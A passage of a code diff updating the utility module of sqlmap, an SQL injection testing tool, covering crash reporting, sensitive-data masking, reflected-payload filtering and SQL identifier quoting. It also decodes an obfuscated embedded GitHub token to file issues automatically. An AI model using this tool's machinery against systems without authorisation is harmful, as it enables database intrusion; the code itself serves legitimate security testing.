mode, encoding, errors, buffering) + except IOError: + errMsg = "there has been a file opening error for filename '%s'. " % filename + errMsg += "Please check %s permissions on a file " % ("write" if mode and ('w' in mode or 'a' in mode or '+' in mode) else "read") + errMsg += "and that it's not locked by another process" + raise SqlmapSystemException(errMsg) def decodeIntToUnicode(value): """ Decodes inferenced integer value to an unicode character + + >>> decodeIntToUnicode(35) == '#' + True + >>> decodeIntToUnicode(64) == '@' + True """ retVal = value if isinstance(value, int): try: - # http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_ord - if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): - retVal = getUnicode(hexdecode(hex(value))) - elif value > 255: - retVal = unichr(value) + if value > 255: + _ = "%x" % value + + if len(_) % 2 == 1: + _ = "0%s" % _ + + raw = decodeHex(_) + + if Backend.isDbms(DBMS.MYSQL): + # Reference: https://dev.mysql.com/doc/refman/8.0/en/string-functions.html#function_ord + # Note: https://github.com/sqlmapproject/sqlmap/issues/1531 + retVal = getUnicode(raw, conf.encoding or UNICODE_ENCODING) + elif Backend.isDbms(DBMS.MSSQL): + # Reference: https://docs.microsoft.com/en-us/sql/relational-databases/collations/collation-and-unicode-support?view=sql-server-2017 and https://stackoverflow.com/a/14488478 + retVal = getUnicode(raw, "UTF-16-BE") + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE): # Note: cases with Unicode code points (e.g. http://www.postgresqltutorial.com/postgresql-ascii/) + retVal = _unichr(value) + else: + retVal = getUnicode(raw, conf.encoding) else: - retVal = getUnicode(chr(value)) + retVal = _unichr(value) except: retVal = INFERENCE_UNKNOWN_CHAR return retVal +def getDaysFromLastUpdate(): + """ + Get total number of days from last update + + >>> getDaysFromLastUpdate() >= 0 + True + """ + + if not paths: + return + + return int(time.time() - os.path.getmtime(paths.SQLMAP_SETTINGS_PATH)) // (3600 * 24) + def unhandledExceptionMessage(): """ - Returns detailed message about occured unhandled exception + Returns detailed message about occurred unhandled exception + + >>> all(_ in unhandledExceptionMessage() for _ in ("unhandled exception occurred", "Operating system", "Command line")) + True """ - errMsg = "unhandled exception in %s, retry your " % VERSION_STRING - errMsg += "run with the latest development version from the GitHub " - errMsg += "repository. If the exception persists, please send by e-mail " - errMsg += "to '%s' or open a new issue at '%s' with the following text " % (ML, ISSUES_PAGE) - errMsg += "and any information required to reproduce the bug. The " - errMsg += "developers will try to reproduce the bug, fix it accordingly " - errMsg += "and get back to you.\n" - errMsg += "sqlmap version: %s%s\n" % (VERSION, "-%s" % REVISION if REVISION else "") + errMsg = "unhandled exception occurred in %s. It is recommended to retry your " % VERSION_STRING + errMsg += "run with the latest development version from official GitHub " + errMsg += "repository at '%s'. If the exception persists, please open a new issue " % GIT_PAGE + errMsg += "at '%s' " % ISSUES_PAGE + errMsg += "with the following text and any other information required to " + errMsg += "reproduce the bug. Developers will try to reproduce the bug, fix it accordingly " + errMsg += "and get back to you\n" + errMsg += "Running version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:] errMsg += "Python version: %s\n" % PYVERSION - errMsg += "Operating system: %s\n" % PLATFORM - errMsg += "Command line: %s\n" % " ".join(sys.argv) - errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else None) - errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms()) + errMsg += "Operating system: %s\n" % platform.platform() + errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap\.py\b", "sqlmap.py", getUnicode(" ".join(sys.argv), encoding=getattr(sys.stdin, "encoding", None))) + errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, getTechnique()) if getTechnique() is not None else ("DIRECT" if conf.get("direct") else None)) + errMsg += "Back-end DBMS:" + + if Backend.getDbms() is not None: + errMsg += " %s (fingerprinted)" % Backend.getDbms() + + if Backend.getIdentifiedDbms() is not None and (Backend.getDbms() is None or Backend.getIdentifiedDbms() != Backend.getDbms()): + errMsg += " %s (identified)" % Backend.getIdentifiedDbms() + + if not errMsg.endswith(')'): + errMsg += " None" + + return errMsg + +def getLatestRevision(): + """ + Retrieves latest revision from the offical repository + """ + + retVal = None + req = _urllib.request.Request(url="https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/lib/core/settings.py", headers={HTTP_HEADER.USER_AGENT: fetchRandomAgent()}) + + try: + content = getUnicode(_urllib.request.urlopen(req).read()) + retVal = extractRegexResult(r"VERSION\s*=\s*[\"'](?P[\d.]+)", content) + except: + pass + + return retVal + +def fetchRandomAgent(): + """ + Returns random HTTP User-Agent header value + + >>> '(' in fetchRandomAgent() + True + """ + + if not kb.userAgents: + debugMsg = "loading random HTTP User-Agent header(s) from " + debugMsg += "file '%s'" % paths.USER_AGENTS + logger.debug(debugMsg) + + try: + kb.userAgents = getFileItems(paths.USER_AGENTS) + except IOError: + errMsg = "unable to read HTTP User-Agent header " + errMsg += "file '%s'" % paths.USER_AGENTS + raise SqlmapSystemException(errMsg) + + return random.sample(kb.userAgents, 1)[0] + +def createGithubIssue(errMsg, excMsg): + """ + Automatically create a Github issue with unhandled exception information + """ + + try: + issues = getFileItems(paths.GITHUB_HISTORY, unique=True) + except: + issues = [] + finally: + issues = set(issues) + + _ = re.sub(r"'[^']+'", "''", excMsg) + _ = re.sub(r"\s+line \d+", "", _) + _ = re.sub(r'File ".+?/(\w+\.py)', r"\g<1>", _) + _ = re.sub(r".+\Z", "", _) + _ = re.sub(r"(Unicode[^:]*Error:).+", r"\g<1>", _) + _ = re.sub(r"= _", "= ", _) + + key = hashlib.md5(getBytes(_)).hexdigest()[:8] + + if key in issues: + return + + msg = "\ndo you want to automatically create a new (anonymized) issue " + msg += "with the unhandled exception information at " + msg += "the official Github repository? [y/N] " + try: + choice = readInput(msg, default='N', checkBatch=False, boolean=True) + except: + choice = None + + if choice: + _excMsg = None + errMsg = errMsg[errMsg.find("\n"):] + + req = _urllib.request.Request(url="https://api.github.com/search/issues?q=%s" % _urllib.parse.quote("repo:sqlmapproject/sqlmap Unhandled exception (#%s)" % key), headers={HTTP_HEADER.USER_AGENT: fetchRandomAgent()}) + + try: + content = _urllib.request.urlopen(req).read() + _ = json.loads(content) + duplicate = _["total_count"] > 0 + closed = duplicate and _["items"][0]["state"] == "closed" + if duplicate: + warnMsg = "issue seems to be already reported" + if closed: + warnMsg += " and resolved. Please update to the latest " + warnMsg += "development version from official GitHub repository at '%s'" % GIT_PAGE + logger.warning(warnMsg) + return + except: + pass - return maskSensitiveData(errMsg) + data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)} + token = getText(zlib.decompress(decodeBase64(GITHUB_REPORT_OAUTH_TOKEN[::-1], binary=True))[0::2][::-1]) + req = _urllib.request.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=getBytes(json.dumps(data)), headers={HTTP_HEADER.AUTHORIZATION: "token %s" % token, HTTP_HEADER.USER_AGENT: fetchRandomAgent()}) + + try: + content = getText(_urllib.request.urlopen(req).read()) + except Exception as ex: + content = None + _excMsg = getSafeExString(ex) + + issueUrl = re.search(r"https://github.com/sqlmapproject/sqlmap/issues/\d+", content or "") + if issueUrl: + infoMsg = "created Github issue can been found at the address '%s'" % issueUrl.group(0) + logger.info(infoMsg) + + try: + with openFile(paths.GITHUB_HISTORY, "a+") as f: + f.write("%s\n" % key) + except: + pass + else: + warnMsg = "something went wrong while creating a Github issue" + if _excMsg: + warnMsg += " ('%s')" % _excMsg + if "Unauthorized" in warnMsg: + warnMsg += ". Please update to the latest revision" + logger.warning(warnMsg) def maskSensitiveData(msg): """ Masks sensitive data in the supplied message + + >>> maskSensitiveData('python sqlmap.py -u "http://www.test.com/vuln.php?id=1" --banner') == 'python sqlmap.py -u *********************************** --banner' + True + >>> maskSensitiveData('sqlmap.py -u test.com/index.go?id=index --auth-type=basic --auth-creds=foo:bar\\ndummy line') == 'sqlmap.py -u ************************** --auth-type=***** --auth-creds=*******\\ndummy line' + True """ - retVal = msg + retVal = getUnicode(msg) + + for item in filterNone(conf.get(_) for _ in SENSITIVE_OPTIONS): + if isListLike(item): + item = listToStrValue(item) - for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "aCred", "pCred", "tbl", "db", "col", "user", "cookie", "proxy"))): - regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", item) + regex = SENSITIVE_DATA_REGEX % re.sub(r"(\W)", r"\\\1", getUnicode(item)) while extractRegexResult(regex, retVal): value = extractRegexResult(regex, retVal) retVal = retVal.replace(value, '*' * len(value)) + # Just in case (for problematic parameters regarding user encoding) + for match in re.finditer(r"(?im)[ -]-(u|url|data|cookie|auth-\w+|proxy|host|referer|headers?|H)( |=)(.*?)(?= -?-[a-z]|$)", retVal): + retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) + + # Fail-safe substitutions + retVal = re.sub(r"(?i)(Command line:.+)\b(https?://[^ ]+)", lambda match: "%s%s" % (match.group(1), '*' * len(match.group(2))), retVal) + retVal = re.sub(r"(?i)(\b\w:[\\/]+Users[\\/]+|[\\/]+home[\\/]+)([^\\/]+)", lambda match: "%s%s" % (match.group(1), '*' * len(match.group(2))), retVal) + + if getpass.getuser(): + retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), '*' * len(getpass.getuser()), retVal) + return retVal def listToStrValue(value): @@ -2562,7 +4078,7 @@ def listToStrValue(value): '1, 2, 3' """ - if isinstance(value, (set, tuple)): + if isinstance(value, (set, tuple, types.GeneratorType)): value = list(value) if isinstance(value, list): @@ -2572,48 +4088,55 @@ def listToStrValue(value): return retVal -def getExceptionFrameLocals(): +def intersect(containerA, containerB, lowerCase=False): """ - Returns dictionary with local variable content from frame - where exception has been raised + Returns intersection of the container-ized values + + >>> intersect([1, 2, 3], set([1,3])) + [1, 3] """ - retVal = {} + retVal = [] + + if containerA and containerB: + containerA = arrayizeValue(containerA) + containerB = arrayizeValue(containerB) + + if lowerCase: + containerA = [val.lower() if hasattr(val, "lower") else val for val in containerA] + containerB = [val.lower() if hasattr(val, "lower") else val for val in containerB] - if sys.exc_info(): - trace = sys.exc_info()[2] - while trace.tb_next: - trace = trace.tb_next - retVal = trace.tb_frame.f_locals + retVal = [val for val in containerA if val in containerB] return retVal -def intersect(valueA, valueB, lowerCase=False): +def decodeStringEscape(value): """ - Returns intersection of the array-ized values + Decodes escaped string values (e.g. "\\t" -> "\t") """ - retVal = None - - if valueA and valueB: - valueA = arrayizeValue(valueA) - valueB = arrayizeValue(valueB) - - if lowerCase: - valueA = [val.lower() if isinstance(val, basestring) else val for val in valueA] - valueB = [val.lower() if isinstance(val, basestring) else val for val in valueB] + retVal = value - retVal = [val for val in valueA if val in valueB] + if value and '\\' in value: + charset = "\\%s" % string.whitespace.replace(" ", "") + for _ in charset: + retVal = retVal.replace(repr(_).strip("'"), _) return retVal -def cpuThrottle(value): +def encodeStringEscape(value): """ - Does a CPU throttling for lesser CPU consumption + Encodes escaped string values (e.g. "\t" -> "\\t") """ - delay = 0.00001 * (value ** 2) - time.sleep(delay) + retVal = value + + if value: + charset = "\\%s" % string.whitespace.replace(" ", "") + for _ in charset: + retVal = retVal.replace(_, repr(_).strip("'")) + + return retVal def removeReflectiveValues(content, payload, suppressWarning=False): """ @@ -2623,126 +4146,224 @@ def removeReflectiveValues(content, payload, suppressWarning=False): retVal = content - if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism: - def _(value): - while 2 * REFLECTED_REPLACEMENT_REGEX in value: - value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX) - return value - - payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True)) - regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape"))) - - if regex != payload: - if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check - parts = regex.split(REFLECTED_REPLACEMENT_REGEX) - retVal = content.replace(payload, REFLECTED_VALUE_MARKER) # dummy approach + try: + if all((content, payload)) and isinstance(content, six.text_type) and kb.reflectiveMechanism and not kb.heuristicMode: + def _(value): + while 2 * REFLECTED_REPLACEMENT_REGEX in value: + value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX) + return value - if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs - regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:]))) + payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ""), convall=True)) + regex = _(filterStringValue(payload, r"[A-Za-z0-9]", encodeStringEscape(REFLECTED_REPLACEMENT_REGEX))) - parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX)) + # NOTE: special case when part of the result shares the same output as the payload (e.g. ?id=1... and "sqlmap/1.0-dev (http://sqlmap.org)") + preserve = extractRegexResult(r"%s(?P.+?)%s" % (kb.chars.start, kb.chars.stop), content) + if preserve: + content = content.replace(preserve, REPLACEMENT_MARKER) - if regex.startswith(REFLECTED_REPLACEMENT_REGEX): - regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):]) - else: - regex = r"\b%s" % regex + if regex != payload: + if all(part.lower() in content.lower() for part in filterNone(regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check + parts = regex.split(REFLECTED_REPLACEMENT_REGEX) - if regex.endswith(REFLECTED_REPLACEMENT_REGEX): - regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX) - else: - regex = r"%s\b" % regex + # Note: naive approach + retVal = content.replace(payload, REFLECTED_VALUE_MARKER) + retVal = retVal.replace(re.sub(r"\A\w+", "", payload), REFLECTED_VALUE_MARKER) - retVal = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, retVal) + if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs + regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS // 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS // 2:]))) - if len(parts) > 2: - regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:]) - retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal) + parts = filterNone(regex.split(REFLECTED_REPLACEMENT_REGEX)) - if retVal != content: - kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1 - if not suppressWarning: - warnMsg = "reflective value(s) found and filtering out" - singleTimeWarnMessage(warnMsg) + if regex.startswith(REFLECTED_REPLACEMENT_REGEX): + regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):]) + else: + regex = r"\b%s" % regex - if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I): - warnMsg = "frames detected containing attacked parameter values. Please be sure to " - warnMsg += "test those separately in case that attack on this page fails" - singleTimeWarnMessage(warnMsg) + if regex.endswith(REFLECTED_REPLACEMENT_REGEX): + regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX) + else: + regex = r"%s\b" % regex + + _retVal = [retVal] + + def _thread(regex): + try: + _retVal[0] = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, _retVal[0]) + + if len(parts) > 2: + regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:]) + _retVal[0] = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, _retVal[0]) + except KeyboardInterrupt: + raise + except: + pass + + thread = threading.Thread(target=_thread, args=(regex,)) + thread.daemon = True + thread.start() + thread.join(REFLECTED_REPLACEMENT_TIMEOUT) + + if thread.is_alive(): + kb.reflectiveMechanism = False + retVal = content + if not suppressWarning: + debugMsg = "turning off reflection removal mechanism (because of timeouts)" + logger.debug(debugMsg) + else: + retVal = _retVal[0] - elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]: - kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1 - if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD: - kb.reflectiveMechanism = False + if retVal != content: + kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1 if not suppressWarning: - debugMsg = "turning off reflection removal mechanism (for optimization purposes)" - logger.debug(debugMsg) + warnMsg = "reflective value(s) found and filtering out" + singleTimeWarnMessage(warnMsg) + + if re.search(r"(?i)FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal): + warnMsg = "frames detected containing attacked parameter values. Please be sure to " + warnMsg += "test those separately in case that attack on this page fails" + singleTimeWarnMessage(warnMsg) + + elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]: + kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1 + if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD: + kb.reflectiveMechanism = False + if not suppressWarning: + debugMsg = "turning off reflection removal mechanism (for optimization purposes)" + logger.debug(debugMsg) + + if preserve and retVal: + retVal = retVal.replace(REPLACEMENT_MARKER, preserve) + + except (MemoryError, SystemError): + kb.reflectiveMechanism = False + if not suppressWarning: + debugMsg = "turning off reflection removal mechanism" + logger.debug(debugMsg) return retVal -def normalizeUnicode(value): +def normalizeUnicode(value, charset=string.printable[:string.printable.find(' ') + 1]): """ Does an ASCII normalization of unicode strings - Reference: http://www.peterbe.com/plog/unicode-to-ascii + + # Reference: http://www.peterbe.com/plog/unicode-to-ascii + + >>> normalizeUnicode(u'\\u0161u\\u0107uraj') == u'sucuraj' + True + >>> normalizeUnicode(getUnicode(decodeHex("666f6f00626172"))) == u'foobar' + True """ - return unicodedata.normalize('NFKD', value).encode('ascii', 'ignore') if isinstance(value, unicode) else value + retVal = value + + if isinstance(value, six.text_type): + retVal = unicodedata.normalize("NFKD", value) + retVal = "".join(_ for _ in retVal if _ in charset) + + return retVal def safeSQLIdentificatorNaming(name, isTable=False): """ Returns a safe representation of SQL identificator name (internal data format) - Reference: http://stackoverflow.com/questions/954884/what-special-characters-are-allowed-in-t-sql-column-retVal + + # Reference: http://stackoverflow.com/questions/954884/what-special-characters-are-allowed-in-t-sql-column-retVal + + >>> pushValue(kb.forcedDbms) + >>> kb.forcedDbms = DBMS.MSSQL + >>> getText(safeSQLIdentificatorNaming("begin")) + '[begin]' + >>> getText(safeSQLIdentificatorNaming("foobar")) + 'foobar' + >>> kb.forceDbms = popValue() """ retVal = name - if isinstance(name, basestring): + if conf.unsafeNaming: + return retVal + + if isinstance(name, six.string_types): retVal = getUnicode(name) _ = isTable and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) if _: - retVal = re.sub(r"(?i)\A%s\." % DEFAULT_MSSQL_SCHEMA, "", retVal) - - if not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ("." if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS): - retVal = "`%s`" % retVal.strip("`") - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.DB2): - retVal = "\"%s\"" % retVal.strip("\"") - elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,): - retVal = "[%s]" % retVal.strip("[]") + retVal = re.sub(r"(?i)\A\[?%s\]?\." % DEFAULT_MSSQL_SCHEMA, "%s." % DEFAULT_MSSQL_SCHEMA, retVal) + + # Note: SQL 92 has restrictions for identifiers starting with underscore (e.g. http://www.frontbase.com/documentation/FBUsers_4.pdf) + if retVal.upper() in kb.keywords or (not isTable and (retVal or " ")[0] == '_') or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ('.' if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal) + if not conf.noEscape: + retVal = unsafeSQLIdentificatorNaming(retVal) + + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE): # Note: in SQLite double-quotes are treated as string if column/identifier is non-existent (e.g. SELECT "foobar" FROM users) + retVal = "`%s`" % retVal + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX, DBMS.MONETDB, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO, DBMS.SNOWFLAKE): + retVal = "\"%s\"" % retVal + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.ALTIBASE, DBMS.MIMERSQL): + retVal = "\"%s\"" % retVal.upper() + elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): + if isTable: + parts = retVal.split('.', 1) + for i in xrange(len(parts)): + if parts[i] and (re.search(r"\A\d|[^\w]", parts[i], re.U) or parts[i].upper() in kb.keywords): + parts[i] = "[%s]" % parts[i] + retVal = '.'.join(parts) + else: + if re.search(r"\A\d|[^\w]", retVal, re.U) or retVal.upper() in kb.keywords: + retVal = "[%s]" % retVal if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal): - retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal) + if (conf.db or "").lower() != "information_schema": # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5192 + retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal) return retVal def unsafeSQLIdentificatorNaming(name): """ Extracts identificator's name from its safe SQL representation + + >>> pushValue(kb.forcedDbms) + >>> kb.forcedDbms = DBMS.MSSQL + >>> getText(unsafeSQLIdentificatorNaming("[begin]")) + 'begin' + >>> getText(unsafeSQLIdentificatorNaming("foobar")) + 'foobar' + >>> kb.forceDbms = popValue() """ retVal = name - if isinstance(name, basestring): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS): + if isinstance(name, six.string_types): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE): retVal = name.replace("`", "") - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.DB2): + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX, DBMS.MONETDB, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO, DBMS.SNOWFLAKE): retVal = name.replace("\"", "") - elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,): + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.ALTIBASE, DBMS.MIMERSQL): + retVal = name.replace("\"", "").upper() + elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): retVal = name.replace("[", "").replace("]", "") if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): - prefix = "%s." % DEFAULT_MSSQL_SCHEMA - if retVal.startswith(prefix): - retVal = retVal[len(prefix):] + retVal = re.sub(r"(?i)\A\[?%s\]?\." % DEFAULT_MSSQL_SCHEMA, "", retVal) return retVal def isNoneValue(value): """ Returns whether the value is unusable (None or '') + + >>> isNoneValue(None) + True + >>> isNoneValue('None') + True + >>> isNoneValue('') + True + >>> isNoneValue([]) + True + >>> isNoneValue([2]) + False """ - if isinstance(value, basestring): + if isinstance(value, six.string_types): return value in ("None", "") elif isListLike(value): return all(isNoneValue(_) for _ in value) @@ -2754,9 +4375,14 @@ def isNoneValue(value): def isNullValue(value): """ Returns whether the value contains explicit 'NULL' value + + >>> isNullValue(u'NULL') + True + >>> isNullValue(u'foobar') + False """ - return isinstance(value, basestring) and value.upper() == NULL + return hasattr(value, "upper") and value.upper() == NULL def expandMnemonics(mnemonics, parser, args): """ @@ -2785,9 +4411,9 @@ def __init__(self): pointer = pointer.next[char] pointer.current.append(option) - for mnemonic in mnemonics.split(','): + for mnemonic in (mnemonics or "").split(','): found = None - name = mnemonic.split('=')[0].replace("-", "").strip() + name = mnemonic.split('=')[0].replace('-', "").strip() value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None pointer = head @@ -2811,17 +4437,21 @@ def __init__(self): if opt.startswith(name): options[opt] = option - if name in options: + if not options: + warnMsg = "mnemonic '%s' can't be resolved" % name + logger.warning(warnMsg) + elif name in options: found = name debugMsg = "mnemonic '%s' resolved to %s). " % (name, found) logger.debug(debugMsg) else: - found = sorted(options.keys(), key=lambda x: len(x))[0] - warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to: %s). " % (name, ", ".join("'%s'" % key for key in options.keys())) + found = sorted(options.keys(), key=len)[0] + warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to any of: %s). " % (name, ", ".join("'%s'" % key for key in options)) warnMsg += "Resolved to shortest of those ('%s')" % found - logger.warn(warnMsg) + logger.warning(warnMsg) - found = options[found] + if found: + found = options[found] else: found = pointer.current[0] debugMsg = "mnemonic '%s' resolved to %s). " % (name, found) @@ -2844,14 +4474,20 @@ def __init__(self): def safeCSValue(value): """ Returns value safe for CSV dumping - Reference: http://tools.ietf.org/html/rfc4180 + + # Reference: http://tools.ietf.org/html/rfc4180 + + >>> safeCSValue('foo, bar') + '"foo, bar"' + >>> safeCSValue('foobar') + 'foobar' """ retVal = value - if retVal and isinstance(retVal, basestring): + if retVal and isinstance(retVal, six.string_types): if not (retVal[0] == retVal[-1] == '"'): - if any(_ in retVal for _ in (conf.csvDel, '"', '\n')): + if any(_ in retVal for _ in (conf.get("csvDel", defaults.csvDel), '"', '\n')): retVal = '"%s"' % retVal.replace('"', '""') return retVal @@ -2859,36 +4495,72 @@ def safeCSValue(value): def filterPairValues(values): """ Returns only list-like values with length 2 + + >>> filterPairValues([[1, 2], [3], 1, [4, 5]]) + [[1, 2], [4, 5]] """ retVal = [] if not isNoneValue(values) and hasattr(values, '__iter__'): - retVal = filter(lambda x: isinstance(x, (tuple, list, set)) and len(x) == 2, values) + retVal = [value for value in values if isinstance(value, (tuple, list, set)) and len(value) == 2] return retVal def randomizeParameterValue(value): """ - Randomize a parameter value based on occurances of alphanumeric characters + Randomize a parameter value based on occurrences of alphanumeric characters + + >>> random.seed(0) + >>> randomizeParameterValue('foobar') + 'fupgpy' + >>> randomizeParameterValue('17') + '36' """ retVal = value - for match in re.finditer('[A-Z]+', value): - retVal = retVal.replace(match.group(), randomStr(len(match.group())).upper()) + retVal = re.sub(r"%[0-9a-fA-F]{2}", "", retVal) - for match in re.finditer('[a-z]+', value): - retVal = retVal.replace(match.group(), randomStr(len(match.group())).lower()) + def _replace_upper(match): + original = match.group() + while True: + candidate = randomStr(len(original)).upper() + if candidate != original: + return candidate - for match in re.finditer('[0-9]+', value): - retVal = retVal.replace(match.group(), str(randomInt(len(match.group())))) + def _replace_lower(match): + original = match.group() + while True: + candidate = randomStr(len(original)).lower() + if candidate != original: + return candidate + + def _replace_digit(match): + original = match.group() + while True: + candidate = str(randomInt(len(original))) + if candidate != original: + return candidate + + retVal = re.sub(r"[A-Z]+", _replace_upper, retVal) + retVal = re.sub(r"[a-z]+", _replace_lower, retVal) + retVal = re.sub(r"[0-9]+", _replace_digit, retVal) + + if re.match(r"\A[^@]+@.+\.[a-z]+\Z", value): + parts = retVal.split('.') + parts[-1] = random.sample(RANDOMIZATION_TLDS, 1)[0] + retVal = '.'.join(parts) + + if not retVal: + retVal = randomStr(lowercase=True) return retVal +@cachedmethod def asciifyUrl(url, forceQuote=False): """ - Attempts to make a unicode url usuable with ``urllib/urllib2``. + Attempts to make a unicode URL usable with ``urllib/urllib2``. More specifically, it attempts to convert the unicode object ``url``, which is meant to represent a IRI, to an unicode object that, @@ -2899,19 +4571,30 @@ def asciifyUrl(url, forceQuote=False): See also RFC 3987. - Reference: http://blog.elsdoerfer.name/2008/12/12/opening-iris-in-python/ + # Reference: http://blog.elsdoerfer.name/2008/12/12/opening-iris-in-python/ + + >>> asciifyUrl(u'http://www.\\u0161u\\u0107uraj.com') + 'http://www.xn--uuraj-gxa24d.com' """ - parts = urlparse.urlsplit(url) - if not parts.scheme or not parts.netloc: + parts = _urllib.parse.urlsplit(url) + if not all((parts.scheme, parts.netloc, parts.hostname)): # apparently not an url - return url + return getText(url) if all(char in string.printable for char in url): - return url + return getText(url) + + hostname = parts.hostname + + if isinstance(hostname, six.binary_type): + hostname = getUnicode(hostname) # idna-encode domain - hostname = parts.hostname.encode("idna") + try: + hostname = hostname.encode("idna") + except: + hostname = hostname.encode("punycode") # UTF8-quote the other parts. We check each part individually if # if needs to be quoted - that should catch some additional user @@ -2920,10 +4603,10 @@ def asciifyUrl(url, forceQuote=False): def 